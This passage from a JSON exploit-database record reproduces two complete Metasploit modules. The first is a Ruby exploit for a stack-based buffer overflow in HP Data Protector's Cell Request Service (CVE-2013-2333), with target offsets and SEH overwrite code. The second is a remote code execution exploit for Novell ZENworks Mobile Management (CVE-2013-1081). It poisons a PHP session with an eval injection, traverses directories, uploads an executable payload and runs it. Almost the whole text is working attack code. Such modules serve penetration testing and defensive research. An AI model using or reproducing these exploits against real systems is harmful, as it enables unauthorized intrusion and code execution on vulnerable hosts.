module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell Request Service (crs.exe) when parsing packets with opcode 211. 
This module has been tested successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.\n", "modified": "2017-07-24T13:26:21", "published": "2013-10-10T15:06:17", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_DATAPROTECTOR_CRS", "href": "", "type": "metasploit", "title": "HP Data Protector Cell Request Service Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Data Protector Cell Request Service Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. 
This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.\n },\n 'Author' =>\n [\n 'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2333' ],\n [ 'OSVDB', '93867' ],\n [ 'BID', '60309' ],\n [ 'ZDI', '13-130' ]\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 4096,\n 'BadChars' => \"\\x00\\xff\\x20\" # \"\\x00\\x00\", \"\\xff\\xff\" and \"\\x20\\x00\" not allowed\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'HP Data Protector 6.20 build 370 / Windows XP SP3',\n {\n 'Ret' => 0x00436fe2, # ppr from crs.exe\n 'Offset' => 15578\n }\n ],\n [ 'HP Data Protector 7.00 build 72 / Windows XP SP3',\n {\n 'Ret' => 0x004cf8c1, # ppr from crs.exe\n 'Offset' => 15578\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 03 2013'))\n\n deregister_options('RPORT') # The CRS service runs on a random port\n end\n\n def build_pkt(fields)\n data = \"\\xff\\xfe\" # BOM Unicode\n fields.each do |k, v|\n if k == \"Payload\"\n data << \"#{v}\\x00\\x00\"\n else\n data << \"#{Rex::Text.to_unicode(v)}\\x00\\x00\"\n end\n data << Rex::Text.to_unicode(\" \") # Separator\n end\n\n data.chomp!(Rex::Text.to_unicode(\" \")) # Delete last separator\n data << \"\\x00\\x00\" # Ending\n return [data.length].pack(\"N\") + data\n end\n\n def get_fingerprint\n ommni = connect(false, {'RPORT' => 5555})\n ommni.put(rand_text_alpha_upper(64))\n resp = ommni.get_once(-1)\n disconnect\n\n if resp.nil?\n return nil\n end\n\n return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl\n end\n\n def get_crs_port\n\n pkt = build_pkt({\n \"Opcode\" => \"2\",\n \"FakeMachineName\" => rand_text_alpha(8),\n \"Unknown1\" => \"0\",\n \"FakeDomainUser\" => rand_text_alpha(8),\n \"FakeDomain\" => rand_text_alpha(8),\n \"FakeLanguage\" => rand_text_alpha(8),\n \"Unknown2\" => \"15\"\n })\n ommni = connect(false, {'RPORT' => 5555})\n 
ommni.put(pkt)\n resp = ommni.get_once(-1)\n disconnect\n\n if resp.nil?\n return nil\n end\n\n res_length, bom_unicode, res_data = resp.unpack(\"Nna*\")\n\n fields = res_data.split(Rex::Text.to_unicode(\" \"))\n\n opcode = fields[0]\n port = fields[1]\n\n if not opcode or not port\n vprint_error(\"Unexpected response\")\n return nil\n end\n\n opcode = Rex::Text.to_ascii(opcode.chomp(\"\\x00\\x00\"))\n\n if opcode != \"109\"\n vprint_error(\"Unexpected opcode #{opcode} in the response\")\n return nil\n end\n\n port = Rex::Text.to_ascii(port.chomp(\"\\x00\\x00\"))\n return port.to_i\n end\n\n def check\n fingerprint = get_fingerprint\n\n if fingerprint.nil?\n vprint_error(\"Unable to fingerprint\")\n return Exploit::CheckCode::Unknown\n end\n\n port = get_crs_port\n\n if port.nil?\n vprint_status(\"HP Data Protector version #{fingerprint}\")\n vprint_error(\"But CRS port not found\")\n else\n vprint_status(\"CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}\")\n end\n\n if fingerprint =~ /HP Data Protector A\\.06\\.20: INET, internal build 370/\n # More likely to be exploitable\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.07\\.00: INET, internal build 72/\n # More likely to be exploitable\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.07\\.00/\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.07\\.01/\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.06\\.20/\n return Exploit::CheckCode::Appears\n elsif fingerprint =~ /HP Data Protector A\\.06\\.21/\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def get_target\n fingerprint = get_fingerprint\n\n if fingerprint.nil?\n return nil\n end\n\n if fingerprint =~ /HP Data Protector A\\.06\\.20: INET, internal build 370/\n return targets[1]\n elsif fingerprint =~ /HP Data Protector A\\.07\\.00: INET, internal build 72/\n 
return targets[2]\n else\n return nil\n end\n end\n\n def exploit\n\n if target.name =~ /Automatic/\n print_status(\"Trying to find the target version...\")\n my_target = get_target\n else\n my_target = target\n end\n\n if my_target.nil?\n fail_with(Failure::NoTarget, \"Failed to autodetect target\")\n end\n\n print_status(\"Trying to find the CRS service port...\")\n port = get_crs_port\n if port.nil?\n fail_with(Failure::NotFound, \"The CRS service has not been found.\")\n else\n print_good(\"CRS service found on #{port}/TCP\")\n connect(true, {'RPORT' => port})\n end\n\n pkt = build_pkt({\n \"Opcode\" => \"0\",\n \"EndPoint\" => \"GUICORE\",\n \"ClientFingerprint\" => \"HP OpenView OmniBack II A.06.20\",\n \"FakeUsername\" => rand_text_alpha(8),\n \"FakeDomain\" => rand_text_alpha(8),\n \"Unknown1\" => \"488\",\n \"Unknown2\" => rand_text_alpha(8)\n })\n print_status(\"Sending packet with opcode 0...\")\n sock.put(pkt)\n data = sock.get_once(-1)\n\n if data.nil?\n fail_with(Failure::Unknown, \"Error while communicating with the CRS Service\")\n end\n\n if Rex::Text.to_ascii(data) !~ /NT-5\\.1/\n fail_with(Failure::NoTarget, \"Exploit only compatible with Windows XP targets\")\n end\n\n pkt = build_pkt({\n \"Opcode\" => \"225\"\n })\n print_status(\"Sending packet with opcode 225...\")\n sock.put(pkt)\n data = sock.get_once(-1)\n\n if data.nil?\n fail_with(Failure::Unknown, \"Error while communicating with the CRS Service\")\n end\n\n bof = payload.encoded\n bof << rand_text(my_target[\"Offset\"] - payload.encoded.length)\n bof << generate_seh_record(my_target.ret)\n bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-#{my_target['Offset']+8}\").encode_string\n bof << rand_text(100) # Trigger Exception\n\n pkt = build_pkt({\n \"Opcode\" => \"211\",\n \"Payload\" => bof\n })\n print_status(\"Sending malicious packet with opcode 211...\")\n sock.put(pkt)\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, 
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_dataprotector_crs.rb"}, {"lastseen": "2019-11-07T11:58:43", "bulletinFamily": "exploit", "description": "This module exercises a vulnerability in Novell Zenworks Mobile Management's Mobile Device Management component which can allow unauthenticated remote code execution. Due to a flaw in the MDM.php script's input validation, remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language' parameter of a POST call to DUSAP.php.\n", "modified": "2017-07-24T13:26:21", "published": "2013-06-04T16:20:10", "id": "MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MDM_LFI", "href": "", "type": "metasploit", "title": "Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize\n super(\n 'Name' => 'Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability',\n 'Description' => %q{\n This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. 
Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.\n },\n 'Author' =>\n [\n 'steponequit', # Metasploit module\n 'Andrea Micalizzi (aka rgod)' #zdi report\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Novell Zenworks Mobile Device Management on Windows', {} ],\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n ['CVE', '2013-1081'],\n ['OSVDB', '91119'],\n ['ZDI', '13-087'],\n ['URL', 'http://www.novell.com/support/kb/doc.php?id=7011895']\n ],\n 'DisclosureDate' => \"Mar 13 2013\",\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path to the Novell Zenworks MDM install', '/']),\n OptInt.new('RPORT', [true, \"Default remote port\", 80])\n ])\n\n register_advanced_options([\n OptBool.new('SSL', [true, \"Negotiate SSL connection\", false])\n ])\n end\n\n def get_version\n version = nil\n\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => target_uri.path\n })\n\n if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)\n version = res.body.to_s.match(/<p id=\"version\">Version (.*)<\\/p>/)[1]\n end\n\n return version\n end\n\n def check\n v = get_version\n print_status(\"Detected version: #{v || 'Unknown'}\")\n\n if v.nil?\n return Exploit::CheckCode::Unknown\n elsif v =~ /^2\\.6\\.[01]/ or v =~ /^2\\.7\\.0/\n # Conditions based on OSVDB info\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def setup_session()\n sess = Rex::Text.rand_text_alpha(8)\n cmd = Rex::Text.rand_text_alpha(8)\n res = send_request_cgi({\n 'agent' => \"<?php echo(eval($_GET['#{cmd}'])); ?>\",\n 'method' => \"HEAD\",\n 'uri' => normalize_uri(\"#{target_uri.path}/download.php\"),\n 'headers' => {\"Cookie\" => \"PHPSESSID=#{sess}\"},\n })\n return sess,cmd\n end\n\n def 
upload_shell(session_id,cmd_var)\n fname = Rex::Text.rand_text_alpha(8)\n payload = generate_payload_exe\n cmd = \"$wdir=getcwd().'\\\\\\\\..\\\\\\\\..\\\\\\\\php\\\\\\\\temp\\\\\\\\';\"\n cmd << \"file_put_contents($wdir.'#{fname}.exe',\"\n cmd << \"base64_decode(file_get_contents('php://input')));\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"DUSAP.php\"),\n 'data' => Rex::Text.encode_base64(payload),\n 'vars_get' => {\n 'language' => \"res/languages/../../../../php/temp/sess_#{session_id}\",\n cmd_var => cmd\n }\n })\n return fname\n end\n\n def exec_shell(session_id,cmd_var,fname)\n cmd = \"$wdir=getcwd().'\\\\\\\\..\\\\\\\\..\\\\\\\\php\\\\\\\\temp\\\\\\\\';\"\n cmd << \"$cmd=$wdir.'#{fname}';\"\n cmd << \"$output=array();\"\n cmd << \"$handle=proc_open($cmd,array(1=>array('pipe','w')),\"\n cmd << \"$pipes,null,null,array('bypass_shell'=>true));\"\n cmd << \"if (is_resource($handle)){fclose($pipes[1]);proc_close($handle);}\"\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"DUSAP.php\"),\n 'data' => Rex::Text.encode_base64(payload),\n 'vars_get' => {\n 'language' => \"res/languages/../../../../php/temp/sess_#{session_id}\",\n cmd_var => cmd\n }\n })\n end\n\n\n def exploit()\n begin\n print_status(\"Checking application version...\")\n v = get_version\n if v.nil?\n print_error(\"Unable to detect version, abort!\")\n return\n end\n\n print_good(\"Found Version #{v}\")\n print_status(\"Setting up poisoned session\")\n session_id,cmd = setup_session()\n print_status(\"Uploading payload\")\n fname = upload_shell(session_id,cmd)\n print_status(\"Executing payload\")\n exec_shell(session_id,cmd,fname)\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n rescue ::OpenSSL::SSL::SSLError => e\n return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted\n end\n 
end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/novell_mdm_lfi.rb"}]}